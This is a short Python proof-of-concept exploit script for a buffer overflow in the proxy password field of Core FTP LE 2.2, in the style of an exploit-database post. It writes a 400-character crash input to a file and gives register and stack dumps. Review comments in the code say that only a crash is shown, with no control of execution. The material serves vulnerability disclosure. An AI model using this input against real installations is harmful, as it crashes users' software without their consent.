#!/usr/bin/env python
'''
# Exploit Title: Core FTP Le v2.2 - Proxy Password Buffer Overflow
# Date: 2016-7-11
# Author: s0nk3y
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
# Version: 2.2
# Tested on: Windows XP
# CVE: N/A
# Type: Buffer Overflow
[+] Proof of concept
Open Options (Global Settings) -> Proxy, enter "A"*400 (the contents of exploit.txt) in the password field, then click OK.
[+] Registers Detail:
EAX 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ECX 41414145
EDX 0012CE64
EBX 41414145
ESP 0012CB1C
EBP 0012D0C4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
ESI 41414141
EDI 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EIP 004A1523 coreftp.004A1523
'''
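# Crash proof-of-concept input: 400 "A" characters, the value the PoC steps
# in the header enter into the Proxy password field.
# NOTE(review): in the register dump in the header, EIP is still inside
# coreftp while ESI/EBX/ECX hold 0x414141xx, so what is demonstrated is a
# crash on overwritten data; the page does not show control of EIP.
buffer = "A" * 400

# The context manager guarantees the data is flushed and the handle closed.
# The original ended with `exploit.close` (no parentheses), which only
# referenced the method and never called it.
with open("exploit.txt", "w") as exploit:
    exploit.write(buffer)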
'''
[+] Stack:
0012CCEC 00000003 ...
0012CCF0 00498BFE þ‹I. RETURN to coreftp.00498BFE from coreftp.004A1520
0012CCF4 0012D124 $Ñ. ASCII "AAAAAAAAAAAAA...
0012CCF8 0012D034 4Ð.
0012CCFC 41414141 AAAA
0012CD00 00000000 ....
0012CD04 41414141 AAAA
0012CD08 41414141 AAAA
0012CD0C 41414141 AAAA
0012CD10 41414141 AAAA
0012CD14 41414141 AAAA
0012CD18 41414141 AAAA
0012CD1C 41414141 AAAA
....
'''